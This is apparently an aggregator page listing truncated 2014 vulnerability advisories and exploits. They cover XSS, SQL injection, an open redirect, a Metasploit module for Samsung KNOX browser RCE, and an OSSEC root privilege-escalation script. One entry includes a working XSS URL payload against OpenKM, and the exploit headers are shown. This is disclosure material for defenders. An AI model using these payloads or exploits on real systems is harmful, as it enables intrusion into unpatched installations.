Joomla Simple Email Form 1.8.5 Cross Site Scripting

20 November 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication:  October 29, 2014  [without technical details]
Vendor Notification: October 29, 2014 
Public Disclosure: November 19, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...


Snowfox CMS 1.0 Open Redirect

19 November 2014 - Source: http://www.mondounix.com
Snowfox CMS v1.0 (rd param) Open Redirect Vulnerability
 
 
Vendor: Globiz Solutions
Product web page: http://www.snowfoxcms.org
Affected version: 1.0
 
Summary: Snowfox is an open source Content Management System (CMS)
that allows your website users to create and share content based
on permission configurations.
 
Desc: Input passed via the 'rd' GET parameter in 'selectlanguage.class.php'
script is not properly verified before being used to redirect users. This
can be exploited to redirect a user to an arbitrary website e.g. when a user
clicks a specially crafted link to the affected script hosted on a trusted
domain.
 
===========================================================================
\modules\system\controller\selectlanguage.class.php:
----------------------------------------------------
 
28:...


Samsung Galaxy KNOX Android Browser Remote Code Execution

18 November 2014 - Source: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'digest/md5'
 
class Metasploit3 < Msf::Exploit::Remote
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  # Hash that maps payload ID -> (0|1) if an HTTP request has
  # been made to download a payload of that ID
  attr_reader :served_payloads
 
  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Samsung Galaxy KNOX Android Browser RCE',
      'Description'         => %q{
        A vulnerability exists in the KNOX security component of the Samsung Galaxy
        firmware that allows...


XOOPS 2.5.6 SQL Injection

18 November 2014 - Source: http://www.mondounix.com
=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6
 
II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though
started as a portal system, it later developed into a web application
framework. It aims to serve as a web framework for use by small, medium and
large sites, through the installation of modules.
 
III. DESCRIPTION
-------------------------
It...


Proticaret E-Commerce Script 3.0 SQL Injection

18 November 2014 - Source: http://www.mondounix.com
Document Title:
============
Proticaret E-Commerce Script v3.0 >= SQL Injection
 
Release Date:
===========
13 Nov 2014
 
Product & Service Introduction:
========================
Proticaret is a free e-commerce script.
 
Abstract Advisory Information:
=======================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0
 
Vulnerability Disclosure Timeline:
=========================
20 Oct 2014    :    Contact with Vendor
20 Nov 2014    :    Vendor Response
June 26, 2014 :    Patch Released
13 Nov 2014    :    Public Disclosure
 
Discovery Status:
=============
Published
 
Affected Product(s):
===============
Promist Bilgi İletişim...


Pandora FMS 5.1SP1 Cross Site Scripting

18 November 2014 - Source: http://www.mondounix.com
I. VULNERABILITY
 
-------------------------
 
XSS Reflected in Page visualization agents in Pandora FMS v5.1SP1 - Revisión PC141031
 
II. BACKGROUND
Pandora FMS is the monitoring software chosen by several companies all around the world for managing their IT infrastructure. Besides ensuring high performance and maximum flexibility, it has a

III. DESCRIPTION
-------------------------
A Reflected XSS vulnerability has been detected in Pandora FMS in page visualization agents, that allows arbitrary HTML/script code to be executed in the context of the victim user's browser.
 
The code injection is done through the parameter "refr" in the page “/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=”
 
IV....


Openkm Document Management System 6.4.17 Cross Site Scripting

18 November 2014 - Source: http://www.mondounix.com
Openkm Document Management System Suffers From Cross Site Scripting Attack
 
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/openkm.jpg
 
Version <=6.4.17
Software Test http://demo.openkm.com/OpenKM/login.jsp
Author: Khalil Shreateh <https://www.facebook.com/khalil.shr>
 
Author Website: http://khalil-shreateh.com
Status : Reported .
Report Link : http://issues.openkm.com/view.php?id=3056
 
Attack Description
 
log in with any user
Navigate to :
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealert%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
 
 
 
POC...


Nibbleblog 4.0.1 Cross Site Scripting

18 November 2014 - Source: http://www.mondounix.com
=============================================
MGC ALERT 2014-002
- Original release date: March 5, 2014
- Last revised:  November 17, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Reflected XSS in Nibbleblog <= v4.0.1
 
II. BACKGROUND
-------------------------
Nibbleblog is a powerful engine for creating blogs, all you need is PHP to
work.
 
III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in Nibbleblog, that allows
arbitrary HTML/script code to be executed in the context of the victim
user's browser.
 
The code injection...


OSSEC 2.8 Privilege Escalation

16 November 2014 - Source: http://www.mondounix.com
#!/usr/bin/python
# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
# Date: 14-11-14
# Exploit Author: skynet-13
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC  - 2.8
# Tested on: Ubuntu x86_64
# CVE : 2014-5284
 
# Created from Research by
# Jeff Petersen
# Roka Security LLC
# jpetersen@rokasecurity.com
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1
 
# Run this on target machine and follow instructions to execute command as root
 
from twisted.internet import inotify
from twisted.python import filepath
from twisted.internet import reactor
import os
import optparse
import...


Gogs Repository Search SQL Injection

16 November 2014 - Source: http://www.mondounix.com
Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs (Go Git Service) is a painless self-hosted Git Service written in
Go. (taken from [1])

It is very similar to the GitHub hosting platform. Multiple users can
create multiple repositories and share code with others with the git
version control system. Repositories can be marked as public or private
to prevent access from unauthorized users.

Gogs provides an api view to give javascript code the possibility to
search for existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=<search...
